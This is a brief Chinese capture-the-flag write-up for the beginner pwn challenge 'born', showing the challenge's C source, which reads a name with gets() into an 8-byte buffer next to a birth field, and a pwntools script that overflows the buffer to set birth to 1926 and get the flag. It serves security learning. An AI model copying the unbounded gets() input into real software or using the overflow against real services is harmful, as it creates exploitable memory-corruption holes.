CGCTF-born

题目地址

看了欢乐赛里面的pwn题稍微了解了一些,但是再深入还是不会做,就想到先来cgctf把最简单的做了2333

打开test.c:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <stdio.h>

struct Student {
char name[8];
int birth;
};

int main(void) {
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
struct Student student;
printf("What\'s Your Birth?\n");
scanf("%d", &student.birth);
while (getchar() != '\n') ;
if (student.birth == 1926) {
printf("You Cannot Born In 1926!\n");
return 0;
}
printf("What\'s Your Name?\n");
gets(student.name);
printf("You Are Born In %d\n", student.birth);
if (student.birth == 1926) {
printf("You Shall Have Flag.\n");
system("cat flag");
} else {
printf("You Are Naive.\n");
printf("You Speed One Second Here.\n");
}
return 0;
}

发现生日输入不能为1926(-1s),但是必须要birth=1926时才能cat flag,于是看到输入name时的gets函数是没有限制的,但是name是一个8字符大小的数组,所以可以通过输入超过8位的字符来覆盖掉birth使其等于1926,代码如下:

1
2
3
4
5
from pwn import *
sh = remote('ctf.acdxvfsvd.net',1926)
sh.sendline('0')
sh.sendline('0'*8 + p32(1926))
sh.interactive

flag get

文章目录
|